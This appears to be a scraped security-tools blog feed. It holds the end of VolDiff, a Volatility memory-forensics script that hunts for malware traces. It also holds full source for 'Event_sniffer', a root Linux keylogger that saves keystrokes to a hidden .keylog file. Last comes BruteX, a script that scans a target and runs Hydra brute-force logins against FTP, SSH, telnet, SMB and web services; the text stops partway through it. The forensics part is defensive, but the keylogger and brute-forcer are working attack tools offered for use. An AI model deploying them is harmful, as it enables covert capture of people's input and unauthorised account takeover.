    if [[ -s $output_dir/tmpfolder/hosts.tmp ]] ; then
      cat $output_dir/tmpfolder/hosts.tmp | grep -v "^#"  > $output_dir/tmpfolder/interresting-hosts.tmp
      if [[ -s $output_dir/tmpfolder/interresting-hosts.tmp ]] ; then
        echo -e "\n\nEntries in hosts files." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/interresting-hosts.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    ################################ MALWARE CHECKS - PERSISTENCE ################################

    echo -e "Searching for persistence artifacts..."

    # highlight temp folders appearing in services:
    cat $output_dir/svcscan/svcscan.txt | grep -i -E "TMP|TEMP|AppData" > $output_dir/tmpfolder/svcscan_temp.tmp
    if [[ -s $output_dir/tmpfolder/svcscan_temp.tmp ]]; then
      echo -e "\n\nTemp folders appearing in services." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/svcscan_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # dump registry keys commonly used for persistence:
    mkdir $output_dir/printkey
    plugin="printkey"
    for key in "Microsoft\Windows\CurrentVersion\RunOnce" "Microsoft\Windows\CurrentVersion\Run" "Software\Microsoft\Windows\CurrentVersion\RunOnce" "Software\Microsoft\Windows\CurrentVersion\Run" "Microsoft\Windows\CurrentVersion\RunServices" "Microsoft\Windows\CurrentVersion\RunServicesOnce" "Software\Microsoft\Windows NT\CurrentVersion\Winlogon" "Microsoft\Security Center\Svc" ; do
      vol.py --profile=$profile -f $memory_image $plugin -K $key &>> $output_dir/tmpfolder/printkey.tmp
      tr < $output_dir/tmpfolder/printkey.tmp -d '\000' > $output_dir/printkey/printkey.txt
    done

    # highlight temp folders appearing in dumped registry keys:
    cat $output_dir/printkey/printkey.txt | grep -i -E "TMP|TEMP|AppData" > $output_dir/tmpfolder/printkey_temp.tmp
    if [[ -s $output_dir/tmpfolder/printkey_temp.tmp ]]; then
      echo -e "\n\nTemp folders appearing in dumped registry keys." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/printkey_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - KERNEL ################################

    # find keylogger traces in messagehooks:
    cat $output_dir/messagehooks/messagehooks.txt | grep -i "KEYBOARD" > $output_dir/tmpfolder/keyboard_messagehooks.tmp
    if [[ -s $output_dir/tmpfolder/keyboard_messagehooks.tmp ]]; then
      echo -e "\n\nKeylogger traces (messagehooks)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/messagehooks/messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/messagehooks/messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/keyboard_messagehooks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unusual timers:
    tail -n +4 $output_dir/timers/timers.txt | grep -E -v -i "ataport.SYS|ntoskrnl.exe|NETIO.SYS|storport.sys|afd.sys|cng.sys|dfsc.sys|discache.sys|HTTP.sys|luafv.sys|ndis.sys|Ntfs.sys|rdbss.sys|rdyboost.sys|spsys.sys|srvnet.sys|srv.sys|tcpip.sys|usbccgp.sys" | sort | uniq >> $output_dir/tmpfolder/timers.tmp
    if [[ -s $output_dir/tmpfolder/timers.tmp ]] ; then
      echo -e "\n\ntimers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set kernel timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find unusual gditimers:
    tail -n +4 $output_dir/gditimers/gditimers.txt | grep -E -v -i "dllhost.exe|explorer.exe|csrss.exe" | sort | uniq >> $output_dir/tmpfolder/gditimers.tmp
    if [[ -s $output_dir/tmpfolder/gditimers.tmp ]] ; then
      echo -e "\n\ngditimers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/gditimers/gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/gditimers/gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/gditimers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find malicious kernel timers:
    cat $output_dir/timers/timers.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_timers.tmp
    if [[ -s $output_dir/tmpfolder/unknown_timers.tmp ]]; then
      echo -e "\n\nMalicious kernel timers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find malicious kernel callbacks:
    cat $output_dir/callbacks/callbacks.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_callbacks.tmp
    if [[ -s $output_dir/tmpfolder/unknown_callbacks.tmp ]]; then
      echo -e "\n\nMalicious kernel callbacks." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/callbacks/callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/callbacks/callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_callbacks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown drivermodule entries:
    cat $output_dir/drivermodule/drivermodule.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_drivermodule.tmp
    if [[ -s $output_dir/tmpfolder/unknown_drivermodule.tmp ]]; then
      echo -e "\n\nNew suspicious drivermodule entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/drivermodule/drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/drivermodule/drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_drivermodule.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown driverirp entries:
    cat $output_dir/driverirp/driverirp.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_driverirp.tmp
    if [[ -s $output_dir/tmpfolder/unknown_driverirp.tmp ]]; then
      echo -e "\n\nNew suspicious driverirp entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_driverirp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hooked ssdt functions:
    cat $output_dir/ssdt/ssdt.txt | grep -i -E -v '(ntos|win32k)' | grep -i "Entry" > $output_dir/tmpfolder/hooked_ssdt.tmp
    if [[ -s $output_dir/tmpfolder/hooked_ssdt.tmp ]]; then
      echo -e "\n\nHooked ssdt functions." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/hooked_ssdt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find suspicious idt entries:
    cat $output_dir/idt/idt.txt | grep -i "rsrc" > $output_dir/tmpfolder/manipulated_idt.tmp
    if [[ -s $output_dir/tmpfolder/manipulated_idt.tmp ]]; then
      echo -e "\n\nSuspicious idt entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/idt/idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/idt/idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/manipulated_idt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # display orphan threads:
    tail -n +4 $output_dir/orphanthreads/orphanthreads.txt > $output_dir/tmpfolder/orphanthreads.tmp
    if [[ -s $output_dir/tmpfolder/orphanthreads.tmp ]]; then
      echo -e "\n\nOrphan threads." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/orphanthreads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - STRINGS ################################

    echo -e "Hunting for badness in memory strings..."

    # dump unusual processes to disk
    tail -n +4 $output_dir/psscan/psscan.txt | grep -v -i -E $usual_processes | tr -s ' ' | cut -d ' ' -f 1 > $output_dir/tmpfolder/offsets_to_dmp.tmp
    mkdir $output_dir/procdump
    while read offset ; do
      vol.py --profile=$profile -f $memory_image -o $offset procdump -D $output_dir/procdump &> /dev/null &
    done < $output_dir/tmpfolder/offsets_to_dmp.tmp
    wait

    # run volatility strings plugin against [some] processes
    mkdir $output_dir/strings
    strings -a -td $output_dir/malfind/dump-dir/* > $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
    strings -a -td $output_dir/procdump/* >> $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
    vol.py --profile=$profile -f $memory_image strings -S --string-file=$output_dir/tmpfolder/process-strings.tmp &> $output_dir/strings/process-strings-vol.txt

    # finding ips/domains/emails in strings:
    cat $output_dir/strings/process-strings-vol.txt | grep -E '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/tmpfolder/ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/tmpfolder/ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/tmpfolder/ip-domains.tmp
    if [[ -s $output_dir/tmpfolder/ip-domains.tmp ]] ; then
      echo -e "\n\nIPs, domains and email addresses found in memory strings." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ip-domains.tmp | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    
    # finding other suspicious strings:
    for pattern in Web Antivirus Virtualisation Sandbox Sysinternals Shell Keylogger Filepath Password Powershell Infogathering Executable Banking Encryption Socialsites Other ; do
      if [[ $pattern == "Web" ]] ; then regex_str=$web_regex_str ; fi
      if [[ $pattern == "Antivirus" ]] ; then regex_str=$antivirus_regex_str ; fi
      if [[ $pattern == "Virtualisation" ]] ; then regex_str=$virtualisation_regex_str ; fi
      if [[ $pattern == "Sandbox" ]] ; then regex_str=$sandbox_regex_str ; fi
      if [[ $pattern == "Sysinternals" ]] ; then regex_str=$sysinternals_regex_str ; fi
      if [[ $pattern == "Shell" ]] ; then regex_str=$shell_regex_str ; fi
      if [[ $pattern == "Keylogger" ]] ; then regex_str=$keylogger_regex_str ; fi
      if [[ $pattern == "Filepath" ]] ; then regex_str=$filepath_regex_str ; fi
      if [[ $pattern == "Password" ]] ; then regex_str=$password_regex_str ; fi
      if [[ $pattern == "Powershell" ]] ; then regex_str=$powershell_regex_str ; fi
      if [[ $pattern == "Infogathering" ]] ; then regex_str=$infogathering_regex_str ; fi
      if [[ $pattern == "Executable" ]] ; then regex_str=$exec_regex_str ; fi
      if [[ $pattern == "Banking" ]] ; then regex_str=$banking_regex_str ; fi
      if [[ $pattern == "Encryption" ]] ; then regex_str=$crypto_regex_str ; fi
      if [[ $pattern == "Socialsites" ]] ; then regex_str=$socialsites_regex_str ; fi
      if [[ $pattern == "Other" ]] ; then regex_str=$other_regex_str ; fi

      if grep -E -i $regex_str $output_dir/strings/process-strings-vol.txt > /dev/null ; then
        echo -e "\n\n$pattern strings found in memory." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        grep -E -i $regex_str $output_dir/strings/process-strings-vol.txt | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    ################################ MALWARE CHECKS - IMPORTS ################################

    # analyse import tables in some processes:
    plugin=impscan
    cat $output_dir/malfind/malfind.txt | grep "Address:" | cut -d ' ' -f 4 | sort | uniq > $output_dir/tmpfolder/procids.tmp
    tail -n +4 $output_dir/psscan/psscan.txt | grep -v -E -i $usual_processes | tr -s ' ' | cut -d " " -f 3 | sort | uniq >> $output_dir/tmpfolder/procids.tmp
    cat $output_dir/tmpfolder/procids.tmp | sort | uniq > $output_dir/tmpfolder/pids.tmp

    while read pid; do
      vol.py --profile=$profile -f $memory_image $plugin -p $pid &> $output_dir/tmpfolder/$pid-imports.tmp
      process=`tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 1-3 | grep -i " "$pid | cut -d ' ' -f 2 | sort | uniq`
      # searching for anti debug import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $anti_debug_imports > $output_dir/tmpfolder/$pid-imports-susp.tmp
      # search for password extraction import functions 
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $password_extract_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for web request import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $web_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for service import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $service_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for process injection import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $process_injection_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for uac bypass import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $uac_bypass_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for misc import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $misc_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      if [[ -s $output_dir/tmpfolder/$pid-imports-susp.tmp ]] ; then
        echo -e "\n\nSuspicious imports in process $process." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/$pid-imports-susp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/pids.tmp

  fi

  ################################ REPORT CREATION ################################
  if [[ $@ =~ "--no-report" ]] ; then
    endtime=$(date +%s)
    echo -e "\nAll done in $(($endtime - $starttime)) seconds."
    rm -r $output_dir/tmpfolder &> /dev/null
    notify-send "VolDiff execution completed."
    exit
  fi

  echo -e "Creating a report..."
  report=VolDiff-report.txt
  touch $output_dir/$report
  echo -e " _    __      ______  _ ________" >> $output_dir/$report
  echo -e "| |  / /___  / / __ \(_) __/ __/" >> $output_dir/$report
  echo -e "| | / / __ \/ / / / / / /_/ /_  " >> $output_dir/$report
  echo -e "| |/ / /_/ / / /_/ / / __/ __/  " >> $output_dir/$report
  echo -e "|___/\____/_/_____/_/_/ /_/     " >> $output_dir/$report
  echo -e "\nVolatility analysis report generated by VolDiff v$version." >> $output_dir/$report 
  echo -e "Download the latest VolDiff version from https://github.com/aim4r/VolDiff/.\n" >> $output_dir/$report
  echo -e "Memory image: $memory_image" >> $output_dir/$report
  echo -e "Profile: $profile" >> $output_dir/$report 
  touch $output_dir/tmpfolder/no_new_entries.tmp

  for plugin in "{plugins_to_report_standalone[@]}" ; do
    tail -n +2 $output_dir/$plugin/$plugin.txt > $output_dir/tmpfolder/output_test.tmp
    if [[ -s $output_dir/tmpfolder/output_test.tmp ]] ; then
      echo -e "\n\n$plugin output." >> $output_dir/$report
      echo -e "===========================================================================\n" >> $output_dir/$report
      tail -n +2 $output_dir/$plugin/$plugin.txt >> $output_dir/$report
      # adding hints to help in further analysis:
      if [[ $@ =~ "--add-hints" ]] ; then
        if [[ $plugin = "malfind" ]] ; then
          echo -e "\nHint: Suspicious malfind processes were dumped to disk, and can be reversed as normal or uploaded to VirusTotal." >> $output_dir/$report
        fi
        if [[ $plugin = "psscan" ]] ; then
          echo -e "\nHint: Use procexedump to dump suspcious processes from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "netscan" ]] ; then
          echo -e "\nHint: Translate suspicious IPs to domains using Google/VirusTotal, and search for the associated domains in memory strings." >> $output_dir/$report
        fi
        if [[ $plugin = "iehistory" ]] ; then
          echo -e "\nHint: iehistory can reveal history details of malware that uses the WinINet API." >> $output_dir/$report
        fi
      fi
    else
      echo -e "$plugin" >> $output_dir/tmpfolder/no_new_entries.tmp 
    fi
  done

  # display list of plugins with no notable changes:
  if [[ -s $output_dir/tmpfolder/no_new_entries.tmp ]]; then
    echo -e "\n\nNo output to highlight for the following plugins." >> $output_dir/$report
    echo -e "===========================================================================\n" >> $output_dir/$report
    cat $output_dir/tmpfolder/no_new_entries.tmp >> $output_dir/$report
  fi

  # display list of plugins hidden from report:
  echo -e "\n\nPlugins that were executed but are not included in the report." >> $output_dir/$report
  echo -e "===========================================================================\n" >> $output_dir/$report
  echo -e "handles\ngetsids\npslist\ndlllist\nfilescan\nshimcache\nsvcscan\nshelbags\nsessions\nmessagehooks\neventhooks\nenvars\nmutantscan\natoms\natomscan\ndrivermodule\ndriverscan\ndevicetree\nmodules\nmodscan\nunloadedmodules\ncallbacks\nldrmodules\nprivs\norphanthreads\nidt\ngdt\ndriverirp\ndeskscan\ntimers\ngditimers\nssdt" >> $output_dir/$report

  # add identified process anomalies to the report:
  if [[ $@ =~ "--malware-checks" ]] ; then
    if [[ -s $output_dir/tmpfolder/malware-checks.tmp ]]; then
      echo -e "" >> $output_dir/$report
      echo "   _               _           _         __                 _ _       " >> $output_dir/$report
      echo "  /_\  _ __   __ _| |_   _ ___(_)___    /__\ ___  ___ _   _| | |_ ___ " >> $output_dir/$report
      echo -E " //_\\\\| '_ \\ / _` | | | | / __| / __|  / \\/// _ \\/ __| | | | | __/ __|" >> $output_dir/$report
      echo -E "/  _  \\ | | | (_| | | |_| \\__ \\ \\__ \\ / _  \\  __/\\__ \\ |_| | | |_\\__ \\" >> $output_dir/$report
      echo "\_/ \_/_| |_|\__,_|_|\__, |___/_|___/ \/ \_/\___||___/\__,_|_|\__|___/" >> $output_dir/$report
      echo "                     |___/                                            " >> $output_dir/$report
      cat $output_dir/tmpfolder/malware-checks.tmp >> $output_dir/$report
    fi
  fi

  echo -e "\n\nEnd of report." >> $output_dir/$report
  rm -r $output_dir/tmpfolder &> /dev/null
  endtime=$(date +%s)
   echo -e "\nAll done in $(($endtime - $starttime)) seconds, report saved to $output_dir/$report."
  notify-send "VolDiff execution completed."

fi

 

Download : v1.2.0.zip  | v1.2.0.tar.gz
SOurce : http://aim4r.github.io/VolDiff/ | Our Post Before

Event_sniffer – linux keylogger based on /dev/input/event* devices.

May 30, 2015, 7:44 pm
$
0
0

little toolset for logging information from /dev/input/event* devices. for the sniffer i first opened the device by myself and parsed it, it worked. but worked much
better with the evdev library.

evdev_sniffer.py
—————-
keyboard sniffer using the evdev library. write per default the logged data to .keylog

event_sniffer.py
—————-
well like evdev_sniffer but without the evdev_library

prerequisites
————-
https://python-evdev.readthedocs.org/en/latest/
pip2 install evdev

Output:

gen_keymap.sh Script:

#!/bin/sh
#
# run as root, uses dumpkeys
#
echo 'ev1l blackh4t t00l - just kidding'
echo "myDict={\\"
dumpkeys |grep "^keycode"|sed -e 's/  / /g'|sed -e 's/  / /g'|cut -d ' ' -f 2,4|sed 's/ /:\"/g'|sed -e 's/$/\",/g'|tr -d '\n'
echo "}"

map_devices.py Script:

#!/usr/bin/env python2
# script for printing device information of /dev/input/event* devices
#

import os
import sys
import evdev as ev

def checkRoot():
	if os.getuid()!=0:
		print '[*] You need root for that'
		return False
	return True

if not checkRoot():
	sys.exit(1)

devList = ev.list_devices()
devList.reverse()
for inp in devList:
	dev = ev.InputDevice(inp)
	print "-"*60
	print "[%s]" % inp
	print "%s\n%s\n%s" % (dev.name, dev.info,dev.phys)
print "-"*60

evdev_sniffer.py Script:

#!/usr/bin/env python2
#
# ufh 2015
# 

import os
import sys
import evdev
import argparse

def rootCheck():
	uid=os.getuid()
	if uid != 0:
		print '[*] You need r00t privileges to open event0'
		return False
	return True

def run(args):

	if not rootCheck():
		sys.exit(1)
	
	fw = open(args.outfile,'wb')

	dList = evdev.list_devices()
	try:
		dList.index(args.device)

	except ValueError, e:
		print 'Problem opening input: ',e
		sys.exit(1)

	dev = evdev.InputDevice(args.device)
	name = dev.name
	phys = dev.phys
	print '[*] Found %s@%s' % (name,phys )

	for e in dev.read_loop():
		if e.type == evdev.ecodes.EV_KEY:

			# get the categorzied object
			ek = evdev.categorize(e)
			# key_down
			if ek.keystate == 1:
				# print to console
				if args.output:
					print ek.keycode

				# bring it in the right format
				data = "%s" % ek.keycode
				data = data.split('_')[1]
				if data == 'SPACE' or data == 'BACKSPACE' or data == 'TAB' or data == 'ENTER':
					data = ' %s ' % data
				else:
					data = '%s' % data
					data = data.lower()

				fw.write(data)
				fw.flush()

	fw.close()

def main():
	parser_desc = 'event keyboard sniffer'
	prog_desc = 'event_sniffer.py'
	parser = argparse.ArgumentParser( prog = prog_desc, description = parser_desc)
	parser.add_argument('-o','--outfile',dest='outfile',required=False,action='store',help='where to write the sniffed data')
	parser.add_argument('-d','--device',dest='device',required=False,action='store',help='different event device to sniff')
	parser.add_argument('-O','--output',dest='output',required=False,action='store',help='print logged characters to screen')
	args = parser.parse_args()
	if not args.device:
		args.device = '/dev/input/event0'

	if not args.outfile:
		args.outfile = '.keylog'

	run(args)

if __name__ == '__main__':
	main()

Source : https://github.com/your-favorite-hacker

BruteX – Automatically brute force all services running on a target.

June 2, 2015, 12:49 pm
$
0
0

BruteX is a simple bash script used to brute force all services on a target.
DEPENDENCIES:
1. NMap
2. Hydra
3. Wfuzz
4. SNMPWalk
5. DNSDict

Bash Script:

#!/bin/bash
# BruteX v1.0 by 1N3
# http://crowdshield.com
#
# ABOUT:
# BruteX is a simple bash script used to brute force all services on a target.
#
# USAGE:
# ./brutex <IP/hostname>
#
# DEPENDENCIES:
# 1. NMap
# 2. Hydra
# 3. Wfuzz
# 4. SNMPWalk
# 5. DNSDict

TARGET="$1"
LOOT_DIR="."
USER_FILE="simple-users.txt"
PASS_FILE="password.lst"
DNS_FILE="namelist.txt"
DIRBUST_FILE="dirbuster.txt"
EXT_FILE="dirbuster-ext.txt"
THREADS="30"
COLOR1='\033[91m'
COLOR2='\033[92m'
COLOR3='\033[92m'
RESET='\e[0m'

# UN-COMMENT TO ENABLE PROXY
#export HYDRA_PROXY=socks4://127.0.0.1:9050

if [ -z $TARGET ]; then
	echo -e "$COLOR1+ -- --=[http://crowdshield.com"
	echo -e "$COLOR1+ -- --=[BruteX v1.0 by 1N3"
	echo -e "$COLOR1+ -- --=[Usage: brutex <targetip>"
	exit
fi

clear

echo -e "$COLOR1 __________                __         ____  ___$RESET"
echo -e "$COLOR1 \______   \_______ __ ___/  |_  ____ \   \/  /$RESET"
echo -e "$COLOR1  |    |  _/\_  __ \  |  \   __\/ __ \ \     / $RESET"
echo -e "$COLOR1  |    |   \ |  | \/  |  /|  | \  ___/ /     \ $RESET"
echo -e "$COLOR1  |______  / |__|  |____/ |__|  \___  >___/\  \ $RESET"
echo -e "$COLOR1         \/                         \/      \_/$RESET"
echo ""
echo -e "$COLOR1 + -- --=[BruteX v1.0 by 1N3$RESET"
echo -e "$COLOR1 + -- --=[http://crowdshield.com$RESET"
echo ""
echo ""

echo -e "$COLOR3################################### Running Port Scan ##############################$RESET"
nmap -T4 --open $TARGET -oX $LOOT_DIR/nmap/$TARGET.xml
echo ""
echo -e "$COLOR3################################### Running Brute Force ############################$RESET"
port_21=`grep 'portid="21"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_22=`grep 'portid="22"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_23=`grep 'portid="23"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_25=`grep 'portid="25"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_110=`grep 'portid="110"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_111=`grep 'portid="111"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_135=`grep 'portid="135"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_139=`grep 'portid="139"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_162=`grep 'portid="162"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_445=`grep 'portid="445"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/$TARGET.xml | grep open`

if [ -z "$port_21" ]
then
	echo -e "$COLOR1 + -- --=[Port 21 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 21 opened... running tests...$RESET"	
	hydra -L $USER_FILE -P $PASS_FILE $TARGET ftp -t $THREADS -e ns
fi

if [ -z "$port_22" ]
then
	echo -e "$COLOR1 + -- --=[Port 22 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 22 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns
fi

if [ -z "$port_23" ]
then
	echo -e "$COLOR1 + -- --=[Port 23 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 23 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns
fi

if [ -z "$port_25" ]
then
	echo -e "$COLOR1 + -- --=[Port 25 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 25 opened... running tests...$RESET"	
	hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns
fi

if [ -z "$port_80" ]
then
	echo -e "$COLOR1 + -- --=[Port 80 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 80 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET/FUZZ.FUZ2Z
fi

if [ -z "$port_110" ]
then
	echo -e "$COLOR1 + -- --=[Port 110 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 110 opened... running tests...$RESET"	
	hydra -L $USER_FILE -P $PASS_FILE $TARGET pop3 -t $THREADS -e ns
fi

if [ -z "$port_139" ]
then
	echo -e "$COLOR1 + -- --=[Port 139 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 139 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET smb -S 139 -t $THREADS -e ns
fi

if [ -z "$port_162" ]
then
	echo -e "$COLOR1 + -- --=[Port 162 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 162 opened... running tests...$RESET"
	for a in `cat /pentest/lists/wordlist-common-snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done;
fi

if [ -z "$port_443" ]
then
	echo -e "$COLOR1 + -- --=[Port 443 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 443 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS https://$TARGET/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS https://$TARGET/FUZZ.FUZ2Z
